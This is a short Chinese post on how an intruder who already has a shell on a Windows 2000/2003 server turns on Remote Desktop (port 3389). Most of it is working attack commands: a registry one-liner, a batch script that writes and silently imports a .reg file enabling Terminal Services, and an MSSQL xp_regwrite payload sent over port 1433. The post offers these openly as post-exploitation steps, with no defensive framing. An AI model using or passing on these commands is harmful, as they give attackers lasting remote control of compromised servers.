<<< 怎么开启服务器的3398端口

拿到shell之后对方没有开启3389端口...

2000的话,需要传3389.exe运行才行。

2003的话方法就多了,可以实现一句话开3389

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 80 /f

 

3389.bat3389

echo Windows Registry Editor Version 5.00 >3389.reg 

echo. >>3389.reg 

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg 

echo "Enabled"="0" >>3389.reg 

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg 

echo "ShutdownWithoutLogon"="0" >>3389.reg 

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg 

echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg 

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg 

echo "TSEnabled"=dword:00000001 >>3389.reg 

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg 

echo "Start"=dword:00000002 >>3389.reg 

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg 

echo "Start"=dword:00000002 >>3389.reg 

echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg 

echo "Hotkey"="1" >>3389.reg 

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg 

echo "PortNumber"=dword:00000D3D >>3389.reg 

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg 

echo "PortNumber"=dword:00000D3D >>3389.reg 

regedit /s 3389.reg

 

1433一句话开3389

exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--  

 

你可能感兴趣的:(服务器)